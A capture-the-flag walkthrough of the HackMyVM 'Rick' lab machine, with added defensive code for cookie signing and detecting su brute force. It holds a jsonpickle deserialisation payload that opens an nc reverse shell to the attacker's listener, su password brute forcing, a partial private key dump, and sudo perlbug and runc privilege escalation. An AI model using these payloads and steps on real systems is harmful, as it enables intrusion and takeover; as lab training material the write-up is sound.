HackMyVm - Rick
Rick is a hard machine written by cromiphi. The first step, getting to the initial user account, is a bit awkward; the subsequent user and root steps are more straightforward.
Find it
┌──(kali㉿kali)-[~/rick]
└─$ sudo netdiscover -r 10.0.0.0/24 -P 1
[sudo] password for kali:
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.0.1 08:00:27:dd:6d:f0 1 60 PCS Systemtechnik GmbH
10.0.0.55 08:00:27:94:4a:67 1 60 PCS Systemtechnik GmbH
-- Active scan completed, 2 Hosts found.
Scan it
┌──(kali㉿kali)-[~/rick]
└─$ nmap -T4 -sC -sV -oN nmap.log 10.0.0.55
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-29 14:44 EST
Nmap scan report for 10.0.0.55
Host is up (0.00063s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 f9:c1:73:95:a4:17:df:f6:ed:5c:8e:8a:c8:05:f9:8f (RSA)
| 256 be:c1:fd:f1:33:64:39:9a:68:35:64:f9:bd:27:ec:01 (ECDSA)
|_ 256 66:f7:6a:e8:ed:d5:1d:2d:36:32:64:39:38:4f:9c:8a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Test Debian Default Page: It works
5000/tcp open http Werkzeug httpd 0.15.5 (Python 2.7.16)
| http-title: 500 Internal Server Error
|_Requested resource was http://10.0.0.55:5000/whoami
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.90 seconds
└─$ ssh 10.0.0.55
kali@10.0.0.55: Permission denied (publickey).
http 5000
Getting a foothold
└─$ curl -v http://10.0.0.55:5000/
* Trying 10.0.0.55:5000...
* Connected to 10.0.0.55 (10.0.0.55) port 5000 (#0)
> GET / HTTP/1.1
> Host: 10.0.0.55:5000
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 302 FOUND
< Content-Type: text/html; charset=utf-8
< Content-Length: 221
< Location: http://10.0.0.55:5000/whoami
< Set-Cookie: username=eyJweS9vYmplY3QiOiAiX19tYWluX18uVXNlciIsICJ1c2VybmFtZSI6ICJSaWNrIn0=; Path=/
< Server: Werkzeug/0.15.5 Python/2.7.16
< Date: Mon, 29 Nov 2021 11:39:18 GMT
<
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
* Closing connection 0
<p>You should be redirected automatically to target URL: <a href="/whoami">/whoami</a>. If not click the link.
┌──(kali㉿kali)-[~/rick]
└─$ echo "eyJweS9vYmplY3QiOiAiX19tYWluX18uVXNlciIsICJ1c2VybmFtZSI6ICJSaWNrIn0="|base64 -d
{"py/object": "__main__.User", "username": "Rick"}
The cookie is a jsonpickle-serialised Python object, so the application is presumably deserialising it with jsonpickle; peas.py generates deserialisation payloads for that module (among others):
└─$ python3 peas.py
Enter RCE command :nc -e /bin/bash 10.0.0.10 8888
Enter operating system of target [linux/windows] . Default is linux :
Want to base64 encode payload ? [N/y] :y
Enter File location and name to save :picklerick
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :jsonpickle
Done Saving file !!!!
┌──(kali㉿kali)-[~/rick]
└─$ cat picklerick_jspick
eyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTAuMC4wLjEwIiwgIjg4ODgiXX1dfV19
(peas.py appends _jspick to the chosen filename.) Decoded, the payload is the following; it just needs to be sent as the username cookie:
{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["nc", "-e", "/bin/bash", "10.0.0.10", "8888"]}]}]}
Setup a listener first, then send the command.
┌──(kali㉿kali)-[~/rick]
└─$ curl --cookie "username=eyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTAuMC4wLjEwIiwgIjg4ODgiXX1dfV19" http://10.0.0.55:5000
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
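The root cause above is that the username cookie is a jsonpickle object graph that the client fully controls. As an added example (not code from the writeup or the target app), this Python shows a check that flags such cookies plus the safer pattern: store plain JSON and bind it with an HMAC so it cannot be rewritten. The secret key is a constructed value.

```python
import base64
import hashlib
import hmac
import json

# Constructed key for this example; a real app loads it from config, not source.
SECRET_KEY = b"example-secret-not-for-production"

# The cookie the Rick app hands out (from the curl output above). It is a
# jsonpickle object graph: "py/object" makes jsonpickle.decode() instantiate a
# class, and "py/reduce" lets it call any importable callable with arguments.
RICK_COOKIE = "eyJweS9vYmplY3QiOiAiX19tYWluX18uVXNlciIsICJ1c2VybmFtZSI6ICJSaWNrIn0="


def has_pickle_markers(obj):
    """True if any key anywhere in a decoded JSON tree starts with 'py/'."""
    if isinstance(obj, dict):
        return any(k.startswith("py/") or has_pickle_markers(v) for k, v in obj.items())
    if isinstance(obj, list):
        return any(has_pickle_markers(v) for v in obj)
    return False


def legacy_cookie_is_suspicious(cookie):
    """Inspect an unsigned base64 cookie like the app's own for gadget markers."""
    try:
        return has_pickle_markers(json.loads(base64.b64decode(cookie)))
    except (ValueError, TypeError):
        return True  # undecodable input is treated as suspicious, not trusted


def make_cookie(username):
    """Plain JSON (data only, no object graph) plus an HMAC over the body."""
    body = base64.urlsafe_b64encode(json.dumps({"username": username}).encode()).decode()
    sig = hmac.new(SECRET_KEY, body.encode(), hashlib.sha256).hexdigest()
    return body + "." + sig


def parse_cookie(cookie):
    """Return the username, or None if the cookie is unsigned, tampered with,
    not a plain object, or carries jsonpickle 'py/' markers."""
    if "." not in cookie:
        return None
    body, sig = cookie.rsplit(".", 1)
    expected = hmac.new(SECRET_KEY, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None
    try:
        data = json.loads(base64.urlsafe_b64decode(body))
    except (ValueError, TypeError):
        return None
    if not isinstance(data, dict) or has_pickle_markers(data):
        return None
    return data["username"] if isinstance(data.get("username"), str) else None
```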
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [10.0.0.10] from (UNKNOWN) [10.0.0.55] 35562
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cat /home/morty/.important
-***You are completely crazy Morty to keep a password that easy! Change it before you get hacked!***-
Since SSH only accepts key authentication, the password for morty must be found on the box itself. I transferred the following script (suBF.sh) to the target from my Kali box.
www-data@rick:/dev/shm$ sh suBF.sh
sh suBF.sh
This tool bruteforces a selected user using binary su and as passwords: null password, username, reverse username and a wordlist (top12000.txt).
You can specify a username using -u <username> and a wordlist via -w <wordlist>.
By default the BF default speed is using 100 su processes at the same time (each su try last 0.7s and a new su try in 0.007s) ~ 143s to complete
You can configure this times using -t (timeout su process) ans -s (sleep between 2 su processes).
Fastest recommendation: -t 0.5 (minimun acceptable) and -s 0.003 ~ 108s to complete
Example: ./suBF.sh -u <USERNAME> [-w top12000.txt] [-t 0.7] [-s 0.007]
THE USERNAME IS CASE SENSITIVE AND THIS SCRIPT DOES NOT CHECK IF THE PROVIDED USERNAME EXIST, BE CAREFUL
www-data@rick:/dev/shm$ sh ./suBF -u morty -w top12000.txt
sh ./suBF -u morty -w top12000.txt
sh: 0: Can't open ./suBF
www-data@rick:/dev/shm$ sh ./suBF.sh -u morty -w top12000.txt
sh ./suBF.sh -u morty -w top12000.txt
[+] Bruteforcing morty...
You can login as morty using password: internet
www-data@rick:/dev/shm$
cat /home/morty/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn....
└─$ ssh morty@10.0.0.55 -i morty_rsa
Linux rick 4.19.0-18-686 #1 SMP Debian 4.19.208-1 (2021-09-29) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Nov 28 21:45:17 2021 from 10.0.0.10
morty@rick:~$
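The su brute force used above is loud: every failed attempt leaves a pam_unix(su:auth) line in auth.log, and suBF.sh fires roughly 100 of them at a time. As an added example (not part of the writeup), this Python detection flags bursts of su failures per (calling user, target user) pair over a constructed auth.log excerpt; the log lines, uids and timestamps are made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt (pam_unix format); hostnames, uids and times are
# made up. Each failed su attempt from the brute force leaves one such line.
SAMPLE_AUTH_LOG = """\
Nov 29 14:50:01 rick su: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty= ruser=www-data rhost=  user=morty
Nov 29 14:50:01 rick su: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty= ruser=www-data rhost=  user=morty
Nov 29 14:50:02 rick su: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty= ruser=www-data rhost=  user=morty
Nov 29 14:50:02 rick su: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty= ruser=www-data rhost=  user=morty
Nov 29 14:50:03 rick su: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty= ruser=www-data rhost=  user=morty
Nov 29 14:50:03 rick su: pam_unix(su:session): session opened for user morty by (uid=33)
Nov 29 16:10:44 rick su: pam_unix(su:auth): authentication failure; logname=morty uid=1001 euid=0 tty=/dev/pts/0 ruser=morty rhost=  user=root
"""

FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ su(?:\[\d+\])?: pam_unix\(su:auth\): "
    r"authentication failure;.*?\bruser=(?P<ruser>\S*).*?\buser=(?P<target>\S+)"
)


def su_failures(lines, year=2021):
    """Yield (timestamp, calling user, target user) for each failed su auth."""
    for line in lines:
        m = FAIL_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ruser"], m["target"]


def detect_su_bursts(log_text, threshold=5, window_seconds=60):
    """Map (ruser, target) -> peak number of failures seen inside any sliding
    window of window_seconds, keeping only pairs that reach the threshold."""
    events = defaultdict(list)
    for ts, ruser, target in su_failures(log_text.splitlines()):
        events[(ruser, target)].append(ts)
    bursts = {}
    for key, stamps in events.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while (ts - stamps[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                bursts[key] = max(bursts.get(key, 0), end - start + 1)
    return bursts
```

A web-server account such as www-data calling su at all is itself worth alerting on, independent of the burst count.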
Escalate to Rick (user)
morty@rick:~$ sudo -l
Matching Defaults entries for morty on rick:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User morty may run the following commands on rick:
(rick) NOPASSWD: /usr/bin/perlbug
morty@rick:~$ sudo -u rick perlbug
This program provides an easy way to create a message reporting
a bug in the core perl distribution (along with tests or
patches) to the volunteers who maintain perl at
perlbug@perl.org. To send a thank-you note to perl-
thanks@perl.org instead of a bug report, please run
'perlthanks'.
Editor [editor]: vim
(same method as "morty")
rick@rick:/home/morty$ id
uid=1000(rick) gid=1000(rick) groups=1000(rick)
Escalate to root
rick@rick:~$ sudo -l
Matching Defaults entries for rick on rick:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User rick may run the following commands on rick:
(ALL : ALL) NOPASSWD: /usr/sbin/runc
rick@rick:~$
rick@rick:~$ cd /dev/shm
rick@rick:/dev/shm$ ls
rick@rick:/dev/shm$ /usr/sbin/runc spec
rick@rick:/dev/shm$ ls
config.json
rick@rick:/dev/shm$ nano config.json
Inside the "mounts" section of the generated config.json add the following lines:
rick@rick:/dev/shm$ mkdir rootfs
rick@rick:/dev/shm$ sudo /usr/sbin/runc run demo
# id
uid=0(root) gid=0(root) groups=0(root)
#
# cd /root
# ls
root.txt
# touch test
touch: cannot touch 'test': Read-only file system
#
The container's root filesystem is read-only by default; to get a writable view, the "root" section of config.json was changed to:
"root": {
"path": "rootfs",
"readonly": false
},